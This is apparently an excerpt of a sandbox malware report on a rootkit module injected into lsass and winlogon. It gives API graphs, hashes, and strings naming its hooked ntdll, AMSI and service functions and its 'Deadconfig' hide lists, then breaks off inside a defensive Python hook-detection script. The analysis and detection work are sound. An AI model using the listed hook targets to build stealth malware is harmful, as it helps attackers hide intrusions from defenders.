                                                        • Instruction Fuzzy Hash: A4E065B5A21A1096E7288FB6D80C34937E1FB88F0AF18C424C90907360DF7D8499CB80
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: 7ded313ef4c4c6f9e5bd58421574de81f15ac3b5dffddee828e04f0291a31005
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: E3E01AB5621A50A7E7299FB6D80C35977E1FB8CF16F58C434C90907320EE3C8499CB10

                                                        Execution Graph

                                                        Execution Coverage:1.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1068
                                                        Total number of Limit Nodes:10
                                                        execution_graph 7790 202c0ae596d 7792 202c0ae5974 7790->7792 7791 202c0ae59db 7792->7791 7793 202c0ae5a57 VirtualProtect 7792->7793 7794 202c0ae5a91 7793->7794 7795 202c0ae5a83 GetLastError 7793->7795 7795->7794 8075 202c0ae28e8 8076 202c0ae292d 8075->8076 8077 202c0ae2990 8076->8077 8078 202c0ae3c70 StrCmpNIW 8076->8078 8078->8076 8079 202c0aee2e8 8080 202c0aee312 8079->8080 8081 202c0aeb980 _set_errno_from_matherr 13 API calls 8080->8081 8082 202c0aee331 8081->8082 8083 202c0aeb9f8 __free_lconv_num 13 API calls 8082->8083 8084 202c0aee33f 8083->8084 8085 202c0aeb980 _set_errno_from_matherr 13 API calls 8084->8085 8089 202c0aee369 8084->8089 8087 202c0aee35b 8085->8087 8086 202c0aed77c 6 API calls 8086->8089 8088 202c0aeb9f8 __free_lconv_num 13 API calls 8087->8088 8088->8089 8089->8086 8090 202c0aee372 8089->8090 7689 202c0aedbe4 7690 202c0aedbf0 7689->7690 7692 202c0aedc17 7690->7692 7693 202c0aefc7c 7690->7693 7694 202c0aefc81 7693->7694 7695 202c0aefcbc 7693->7695 7696 202c0aefcb4 7694->7696 7697 202c0aefca2 DeleteCriticalSection 7694->7697 7695->7690 7698 202c0aeb9f8 __free_lconv_num 13 API calls 7696->7698 7697->7696 7697->7697 7698->7695 7699 202c0ae4000 7701 202c0ae3f4d _invalid_parameter_noinfo 7699->7701 7700 202c0ae3f9d VirtualQuery 7700->7701 7702 202c0ae3fb7 7700->7702 7701->7700 7701->7702 7703 202c0ae4002 GetLastError 7701->7703 7703->7701 7703->7702 8091 202c0ae7efc 8098 202c0ae9470 8091->8098 8096 202c0ae7f09 8099 202c0ae9798 9 API calls 8098->8099 8100 202c0ae7f05 8099->8100 8100->8096 8101 202c0aeabb4 8100->8101 8102 202c0aeb4c4 _set_errno_from_matherr 13 API calls 8101->8102 8103 202c0ae7f12 8102->8103 8103->8096 8104 202c0ae9484 8103->8104 8107 202c0ae972c 8104->8107 8106 202c0ae948f 8106->8096 8108 202c0ae9740 8107->8108 8112 202c0ae975a __std_exception_copy 8107->8112 8109 202c0ae9b10 __vcrt_freeptd 6 API calls 8108->8109 8111 202c0ae974a 8108->8111 8109->8111 8113 202c0ae9b58 
6667->6668 6669 202c0ae1ceb 6667->6669 6668->6648 6671 202c0ae152c 6669->6671 6672 202c0ae157c 6671->6672 6673 202c0ae1546 6671->6673 6672->6668 6673->6672 6674 202c0ae155d StrCmpIW 6673->6674 6675 202c0ae1565 StrCmpW 6673->6675 6674->6673 6675->6673 6776 202c0ae2118 NtQuerySystemInformation 6777 202c0ae2154 6776->6777 6778 202c0ae226e 6777->6778 6785 202c0ae216c 6777->6785 6789 202c0ae2239 6777->6789 6779 202c0ae22e8 6778->6779 6780 202c0ae2279 6778->6780 6782 202c0ae22ed 6779->6782 6779->6789 6796 202c0ae31c0 GetProcessHeap HeapAlloc 6780->6796 6783 202c0ae31c0 11 API calls 6782->6783 6786 202c0ae2291 6783->6786 6784 202c0ae21b4 StrCmpNIW 6784->6785 6785->6784 6787 202c0ae21db 6785->6787 6785->6789 6786->6786 6786->6789 6787->6785 6790 202c0ae1c28 6787->6790 6791 202c0ae1c5a GetProcessHeap HeapAlloc 6790->6791 6792 202c0ae1cb4 6790->6792 6791->6792 6793 202c0ae1c92 6791->6793 6792->6787 6802 202c0ae1bf4 6793->6802 6801 202c0ae3213 6796->6801 6797 202c0ae32dd GetProcessHeap HeapFree 6797->6786 6798 202c0ae32d8 6798->6797 6799 202c0ae326a StrCmpNIW 6799->6801 6800 202c0ae1c28 6 API calls 6800->6801 6801->6797 6801->6798 6801->6799 6801->6800 6803 202c0ae1c0b 6802->6803 6805 202c0ae1c14 GetProcessHeap HeapFree 6802->6805 6804 202c0ae152c 2 API calls 6803->6804 6804->6805 6805->6792

                                                        Control-flow Graph (graph image not reproduced; nodes marked Executed / Not Executed)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: File$DirectoryQueryType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 4175507832-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: 4bb1ee494e169a9bb0dd39553ae720c44ae61645b0d4f36c04ca549f0c7bbb34
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 2E71A0322047C1C6F768DF26989C7EE67A1F389784F460017DF9A57B9ADE34C6298700

                                                        Control-flow Graph (graph image not reproduced; nodes marked Executed / Not Executed)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                        • String ID: Dead$S
                                                        • API String ID: 722747020-3138847638
                                                        • Opcode ID: 3ae11d13c672a2c15ef8f2c2abe976a7c24bc9e535a720ae25352bb0aded48b2
                                                        • Instruction ID: bd51ac949b3103490d5ac84b31713adab3a029a4bdcd659ccb33b0369cfc2db0
                                                        • Opcode Fuzzy Hash: 3ae11d13c672a2c15ef8f2c2abe976a7c24bc9e535a720ae25352bb0aded48b2
                                                        • Instruction Fuzzy Hash: E251BF33B107A1C6F761CB69988C7AC63A4F704784F469513DFA527B86EB38C969C740

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: 28a3fedeb60f698bc809e0eb2bb0f963b496928ff1c4be17e8e8c6bc82d8a7ae
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: FEF01963308781D2FB208B25E8DC3AD6260F754BC8F858023DB894695ADE7DC68DCB00

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 00000202C0AE3631
                                                        • PathFindFileNameW.SHLWAPI ref: 00000202C0AE3640
                                                          • Part of subcall function 00000202C0AE3C70: StrCmpNIW.SHLWAPI(?,?,?,00000202C0AE255A), ref: 00000202C0AE3C88
                                                          • Part of subcall function 00000202C0AE3BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3BC6
                                                          • Part of subcall function 00000202C0AE3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3BF4
                                                          • Part of subcall function 00000202C0AE3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3C16
                                                          • Part of subcall function 00000202C0AE3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3C34
                                                          • Part of subcall function 00000202C0AE3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3C55
                                                        • CreateThread.KERNELBASE ref: 00000202C0AE3687
                                                          • Part of subcall function 00000202C0AE1D3C: GetCurrentThread.KERNEL32 ref: 00000202C0AE1D47
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: 5e00b56a5011f95b9be4416941bb4109cd76edf14fefd3763ee878413cd918bf
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 9F119E33618780E1FB60A730A9CD36F2291BB94344F934527ABA6827D3DF7DC02C8600
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 129f6654ddf291bfcc02ac597e6e4ba9e63da4c3abc93b6d9266984448174bff
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0D910172701390C7FB648F25D08CB6DB7A1F754B98F5681279F4A4778ADA38D84AC704

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                          • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                        • SleepEx.KERNELBASE ref: 00000202C0AE1AE3
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 48f1c9c4e08f8f8a17963c7a05af4dcbaeeea74d55b41f846ca028ac2f06a7b7
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 5821E0722007A1C1FB509B27D9CD36D53A8AB88FC1F0654239FAE87697FE24C879C210
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: 655669d659bb77ae1f59cd8b2a5acccc7e65959268475b5718497181645eae96
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: 37314673205B80CAFB649F60E8983EE6364F798744F45412BDB9E47A9ADF38C648C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 15f99206912596879e935c3c75b41efed11471d7dea19b4e69155ac3cccb53e7
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: F6314B37214B80D6EB60CF25E88879E73A4F788754F550227EB9D47BAADF38C1598B00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 5936a836a689bba17aae5a154ffd51961503c81b4dbbf5008d60181b3871c08f
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 47E1C972B14B80CAF700CB66D4886ED7BB1F344788F118217DF9A57B9ADA39C41AC700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 2b9c6a68379746dcfe5f620ac0ed271bb4b3953634cda9960974bdcd68c4b130
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 9751C172720B94C5FF14CFA6989CAED27A5F758BD8F464523DF1907B86DA78C0498700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 75d6cc8a7f60c5d7a0a3abb83b5a96dac93481f8566d0d9967f6edc72b15a74e
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 2271E577210B50C6FB109F65E8DCA9D27A4FB98F88F4211239B9E47B6ADE39C458C740

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00000202C0AE1D47
                                                          • Part of subcall function 00000202C0AE20C0: GetModuleHandleA.KERNEL32(?,?,?,00000202C0AE1D79), ref: 00000202C0AE20D8
                                                          • Part of subcall function 00000202C0AE20C0: GetProcAddress.KERNEL32(?,?,?,00000202C0AE1D79), ref: 00000202C0AE20E9
                                                          • Part of subcall function 00000202C0AE5F50: GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: ab7f1544dc09a014935df39d3da6b105c6b9b77b85d5372d75e804ce5cf0b645
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: D8418AE2111B8AE0FA04EB68E8DE7DC2325A754384F834423A75907177DF79D66EC360
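The string table of this function is the most informative part of the lsass dump. The routine resolves, via GetModuleHandleA and GetProcAddress, exactly the exports a user-mode rootkit hooks to hide things: NtQuerySystemInformation (process lists), NtQueryDirectoryFile and NtQueryDirectoryFileEx (directory listings), NtEnumerateKey and NtEnumerateValueKey (registry), NtDeviceIoControlFile (the TCP/UDP tables, filtered by checking the handle name against \Device\Nsi with NtQueryObject, as the function at 202c0ae2c10 in this dump does), EnumServicesStatusExW and EnumServiceGroupW (services), the two Pdh counter-array functions (the "\GPU Engine(*)" counters queried elsewhere in this module), AmsiScanBuffer (AMSI) and NtResumeThread (so newly spawned children can be injected, which pairs with the \\.\pipe\Deadchildproc pipe). The hide lists themselves are read from the SOFTWARE\Deadconfig key whose value names (paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp) appear in the function at 202c0ae2c10's neighbour. That set of hook targets and config value names matches the open-source r77 rootkit's layout with its "$77" prefix replaced by "Dead"; the report itself does not name the family.

The practical check for a host that ran this sample is to compare the first bytes of each of those ntdll exports as they sit in the process (here lsass.exe) with the same bytes in ntdll.dll on disk. The following is an added example written for this page, not Joe Sandbox output and not the sample's code. Its load address, export RVAs, syscall numbers and the bytes of the "live" stubs are constructed; two detour targets reuse function addresses from this report's dump purely as illustrative destinations.

```python
"""Inline-hook check for the ntdll exports named in the module's string table.

Added example for this report (not Joe Sandbox output, not the sample's code).
A clean x64 syscall stub starts with  mov r10,rcx ; mov eax,<SSN> ; the usual
detours overwrite those bytes with a jump.  Comparing the first bytes of each
export as read from ntdll.dll on disk with the bytes read from the suspect
process exposes the hook and, for most encodings, where it goes.  Everything
below is constructed: the load address, export RVAs, syscall numbers and the
detour targets (two of them reuse function addresses from this report's dump)."""
import struct
from dataclasses import dataclass
from typing import Optional

# ntdll exports the injected module resolves by name (from the report's string table).
HOOK_TARGETS = ["NtQuerySystemInformation", "NtResumeThread", "NtQueryDirectoryFile",
                "NtQueryDirectoryFileEx", "NtEnumerateKey", "NtEnumerateValueKey",
                "NtDeviceIoControlFile"]
CLEAN_PROLOGUE = bytes.fromhex("4c8bd1b8")  # mov r10,rcx ; mov eax,imm32

@dataclass
class HookReport:
    export: str
    kind: str               # detour encoding, or "patched" if unrecognised
    target: Optional[int]   # resolved detour destination when the encoding allows it
    ssn: Optional[int]      # syscall number recovered from the clean on-disk stub

def clean_ssn(stub: bytes) -> Optional[int]:
    """Syscall number from a clean stub, or None if the prologue is not intact."""
    if len(stub) < 8 or stub[:4] != CLEAN_PROLOGUE:
        return None
    return struct.unpack_from("<I", stub, 4)[0]

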